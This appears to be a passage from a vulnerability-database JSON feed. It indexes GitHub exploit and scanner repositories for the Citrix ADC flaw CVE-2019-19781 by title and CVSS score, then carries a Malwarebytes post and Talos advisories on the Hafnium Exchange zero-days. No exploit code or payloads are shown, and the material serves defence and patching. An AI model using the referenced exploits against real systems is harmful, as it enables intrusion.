"HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-16T10:35:07", "id": "45A4CAC6-39DD-5F6D-B0C4-9688EF931746", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:35:12", "description": "# CVE-2019-19781\r\nAutomated script for Citrix ADC scanner ([CVE-...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-07-27T15:09:51", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-12-13T12:56:50", "id": 
"F27B127B-57F0-5352-B92F-B6F921378CBB", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:34:17", "description": "# Shitrix-CVE-2019-19781\nMy working approach t...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-12T18:53:29", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-07-21T15:54:44", "id": "2849E613-8689-58E7-9C55-A0616B66C91A", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:28:51", "description": "# citrix.sh\nCVE-2019-19781...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", 
"userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-20T15:30:30", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-07-19T01:10:14", "id": "27F3F58D-9FEF-5F4F-91FB-0D93B481FBA4", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:29:24", "description": "# Remote Code Execution Exploit (CVE-2019-19781)- Citrix Applica...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-11T20:43:09", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, 
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2021-04-19T06:52:48", "id": "F3D87CA2-44D8-583C-AF7F-85AA53FB6CAD", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:34:32", "description": "# CVE-2019-19781...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-07-09T14:26:02", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-07-09T14:30:49", "id": "0A8A2E34-0577-5F13-BD78-B9E96A8AF008", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:29:12", "description": "# CVE-2019-19781-Checker\nCheck your website for CVE-2019-19781 V...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", 
"confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-15T10:15:11", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-15T10:20:33", "id": "721C46F4-C390-5D23-B358-3D4B22959428", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:29:34", "description": "# CVE-2019-19781\nCitr...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-11T13:05:28", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": 
false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2021-09-17T11:46:50", "id": "E3D6A7AD-AC9C-55EB-A993-B78D05403B54", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-11T09:14:12", "description": "# Citrix ADC (NetScaler) Honeypot\n- Detects and logs payloads fo...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-22T13:00:18", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2022-05-11T04:52:56", "id": "CA1AFE75-C90A-5C21-92B0-FC1C0282B767", "href": "", "cvss": {"score": 7.5, 
"vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:35:48", "description": "# Remote Code Execution Exploit (CVE-2019-19781)- Citrix Applica...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-07-09T05:17:07", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-07-09T05:17:29", "id": "0829A67E-3C24-5D54-B681-A7F72848F524", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:28:58", "description": "# CVE-2019-19781\nCVE-2019-19781 Attack Triage Script\n\nThe script...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", 
"version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-17T16:14:30", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-21T16:48:21", "id": "ACE1EC69-37E6-58A5-8C0B-96212CDB38DF", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:28:48", "description": "# CVE-2019-19781\nJust a python3 CVE-2019-19781 exploit for Citri...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-28T12:09:51", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": 
"AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-28T21:23:04", "id": "37EBD8DB-50D9-5D1E-B6AB-31330A7C47C7", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:32:49", "description": "# CVE-NetScalerFileSystemCheck\r\nThis script checks the Citrix Ne...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-16T08:52:14", "type": "githubexploit", "title": "Exploit for Path Traversal in Citrix Application Delivery Controller Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2021-06-21T13:40:35", "id": "6787DC40-24C2-5626-B213-399038EFB0E9", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "malwarebytes": [{"lastseen": "2021-03-16T10:27:50", "description": "Microsoft has detected multiple [zero-day](<https://blog.malwarebytes.com/glossary/zero-day/>) exploits being used 
to attack on-premises versions of Microsoft Exchange Server in limited and targeted attacks. Microsoft attributes the attacks to a group they have dubbed Hafnium.\n\n> \u201cHAFNIUM primarily targets entities in the United States across a number of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks, and NGOs.\u201d\n\n### The Hafnium attack group\n\nBesides a rare metal that chemically resembles zirconium, Hafnium is a newly identified attack group that is also thought to be responsible for other attacks on internet-facing servers, and typically exfiltrates data to [file sharing sites](<https://blog.malwarebytes.com/how-tos-2/2020/12/file-sharing-and-cloud-storage-sites-how-safe-are-they/>). Despite their use of leased servers in the US, the group is believed to be based in China (as most security researchers will tell you, attribution is hard, especially when it involves international espionage).\n\n### Exchange Server\n\nIn many organizations, internal cooperation depends on groupware solutions that enable the central administration of emails, calendars, contacts, and tasks. Microsoft Exchange Server is software that offers this functionality for Windows-based server systems.\n\nIn this case the attacker was using one of the zero-day vulnerabilities to steal the full contents of several user mailboxes from such servers.\n\n### Not one, but four zero-days\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). The CVE\u2019s (with descriptions provided by Microsoft) used in these attacks were:\n\n * [**CVE-2021-26855**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>): Microsoft Exchange Server Remote Code Execution Vulnerability. 
This vulnerability is part of an attack chain. The initial attack requires the ability to make an untrusted connection to Exchange server port 443.\n * [**CVE-2021-26857**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>): Microsoft Exchange Server Remote Code Execution Vulnerability. This vulnerability is part of an attack chain. The initial attack requires the ability to make an untrusted connection to Exchange server port 443.\n * [**CVE-2021-26858**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>): Microsoft Exchange Server Remote Code Execution Vulnerability. This vulnerability is part of an attack chain. The initial attack requires the ability to make an untrusted connection to Exchange server port 443.\n * [**CVE-2021-27065**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>): Microsoft Exchange Server Remote Code Execution Vulnerability. This vulnerability is part of an attack chain. The initial attack requires the ability to make an untrusted connection to Exchange server port 443.\n\nThey all look the same. Boring you said? Read on!\n\n### The attack chain\n\nWhile the CVE description is the same for the 4 CVE\u2019s we can learn from the report by the security firm that discovered the attacks, Volexity, that CVE-2021-26855 is a server-side request forgery (SSRF) vulnerability in Exchange that was used to steal mailbox content. The Remote Code Execution (RCE) vulnerability CVE-2021-26857 was used to run code under the System account. The other two zero-day flaws \u2014 CVE-2021-26858 and CVE-2021-27065 \u2014 would allow an attacker to write a file to any part of the server.\n\nTogether these 4 vulnerabilities form a powerful attack chain which only requires the attacker to find the server running Exchange, and the account from which they want to extract email. 
After exploiting these vulnerabilities to gain initial access, Hafnium operators deployed web shells on the compromised servers to gain persistence and make more changes. Web shells can allow attackers to steal data and perform additional malicious actions.\n\n### Urgent patching necessary\n\nEven though the use of the vulnerabilities was described as \u201climited\u201d, now that the information has been made public, we may see a quick rise in the number of attacks. Especially since the attack does not require a lot of information about the victim to start with.\n\nOr as Microsoft\u2019s vice president for customer security Tom Burt put it:\n\n> \u201cEven though we\u2019ve worked quickly to deploy an update for the Hafnium exploits, we know that many nation-state actors and criminal groups will move quickly to take advantage of any unpatched systems.\u201d\n\nUsers of Microsoft Exchange Server 2013, Microsoft Exchange Server 2016, and Microsoft Exchange Server 2019 are advised to apply the updates immediately to protect against these exploits, prioritizing the externally facing Exchange servers.\n\nMicrosoft also advises that the initial stage of the attack can be stopped by "restricting untrusted connections, or by setting up a VPN to separate the Exchange server from external access", although the other parts of the attack chain can still be exploited, if other means of access are used.\n\n### Update March 4, 2021\n\nThe Cybersecurity and Infrastructure Security Agency issued an [emergency directive](<https://cyber.dhs.gov/ed/21-02/>) after CISA partners observed active exploitation of vulnerabilities in Microsoft Exchange _on-premises_ products. 
The directive gives detailed instructions for agencies to follow immediately after identifying all instances of on-premises Microsoft Exchange Servers in their environment.\n\nFor readers that are interested in the more technical details of the attack chain, [Veloxity published a blog](<https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/>) that provides details about their investigation, the vulnerabilities, and which also includes IOCs.\n\n### Update March 5, 2021\n\nIt turns out that [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>) was discovered in December of 2020 by DEVCORE who named the vulnerability ProxyLogon. They called it [ProxyLogon](<https://proxylogon.com/>) because this bug exploits against the Exchange **Proxy** Architecture and **Logon** mechanism. After DEVCORE chained the bugs together to a workable pre-auth RCE exploit, they sent an advisory and exploit to Microsoft through the MSRC portal. The entire timeline can be found [here](<https://proxylogon.com/#timeline>).\n\n### Update March 8, 2021\n\nMicrosoft has released an [updated script that scans Exchange log files](<https://github.com/microsoft/CSS-Exchange/tree/main/Security>) for indicators of compromise (IOCs) associated with the vulnerabilities disclosed on March 2, 2021. 
The US Cybersecurity & Infrastructure Security Agency (CISA) has [issued a warning](<https://us-cert.cisa.gov/ncas/current-activity/2021/03/06/microsoft-ioc-detection-tool-exchange-server-vulnerabilities>) that it is aware of widespread domestic and international exploitation of these vulnerabilities and strongly recommends organizations run the script as soon as possible.\n\nMicrosoft has also added definitions to its standalone malware scanner, the [Microsoft Safety Scanner](<https://docs.microsoft.com/en-us/windows/security/threat-protection/intelligence/safety-scanner-download>) (also known as the Microsoft Support Emergency Response Tool or MSERT), so that it detects web shells.\n\nMalwarebytes detects web shells planted on comprised Exchange servers as [Backdoor.Hafnium](<https://blog.malwarebytes.com/detections/backdoor-hafnium/>). You can read more about the use of web shells in Exchange server attacks in our article [Microsoft Exchange attacks cause panic as criminals go shell collecting](<https://blog.malwarebytes.com/malwarebytes-news/2021/03/microsoft-exchange-attacks-cause-panic-as-criminals-go-shell-collecting/>).\n\n### Update March 12, 2021\n\nThe abuse of these vulnerabilities has sky-rocketed, and the first public proof-of-concept (PoC) exploit for the ProxyLogon flaws has appeared on GitHub, only to be taken down by the site. In spite of Microsoft's efforts, cybercriminals have shown in numbers that they are exploiting this opportunity to the fullest.\n\nA new form of ransomware has also entered the mix. Detections for DearCry, a new form of human-operated ransomware that's deployed through compromised Exchange servers, began yesterday. When the ransomware was still unknown, it would have been detected by Malwarebytes proactively, as Malware.Ransom.Agent.Generic. 
\n\nYou can read more about DearCry ransomware attacks in our article [Ransomware is targeting vulnerable Microsoft Exchange servers](<https://blog.malwarebytes.com/ransomware/2021/03/ransomware-is-targeting-vulnerable-microsoft-exchange-servers/>).\n\n### Update March 16, 2021\n\nMicrosoft has released a new, one-click mitigation tool for Exchange Server deployments. The Microsoft Exchange On-Premises Mitigation Tool will help customers who do not have dedicated security or IT teams to apply these security updates. This new tool is designed as an interim mitigation for customers who are unfamiliar with the patch/update process or who have not yet applied the on-premises Exchange security update.\n\nDetails, a [download link](<https://aka.ms/eomt>), user instructions, and more information can be found in the [Microsoft Security Response Center](<https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>). \n\nWe will keep you posted as we gather more information about these ransomware attacks.\n\nStay safe, everyone!\n\nThe post [Patch now! Exchange servers attacked by Hafnium zero-days](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/patch-now-exchange-servers-attacked-by-hafnium-zero-days/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-03T12:34:27", "type": "malwarebytes", "title": "Patch now! 
Exchange servers attacked by Hafnium zero-days", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-03T12:34:27", "id": "MALWAREBYTES:B4D157FAC0EB655355514D120382CC56", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/patch-now-exchange-servers-attacked-by-hafnium-zero-days/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "talosblog": [{"lastseen": "2021-03-10T14:27:54", "description": "Microsoft released patches for four vulnerabilities in Exchange Server on March 2, disclosing that these vulnerabilities were being exploited by a previously unknown threat actor, referred to as HAFNIUM. The vulnerabilities in question \u2014 CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065 \u2014 affect Microsoft Exchange Server 2019, 2016, 2013 and the out-of-support Microsoft Exchange Server 2010. The patches for these vulnerabilities should be applied as soon as possible. Microsoft... \n \n[[ This is only the beginning! 
Please visit the blog for the complete entry ]]", "cvss3": {}, "published": "2021-03-08T10:18:43", "type": "talosblog", "title": "Threat Advisory: HAFNIUM and Microsoft Exchange zero-day", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-08T10:18:43", "id": "TALOSBLOG:AC8ED8970F5692A325A10D93B7F0D965", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/YIQrIoqvPyk/threat-advisory-hafnium-and-microsoft.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-04-28T12:42:45", "description": "Pulse Secure announced that a critical vulnerability (CVE-2021-22893) was discovered in their VPN service \"Pulse Secure Connect\" in a recent security advisory. The advisory states that, \"a vulnerability was discovered under Pulse Connect Secure (PCS). This includes an authentication by-pass... \n \n[[ This is only the beginning! Please visit the blog for the complete entry ]]", "cvss3": {}, "published": "2021-04-22T10:29:36", "type": "talosblog", "title": "Threat Advisory: Pulse Secure Connect Coverage", 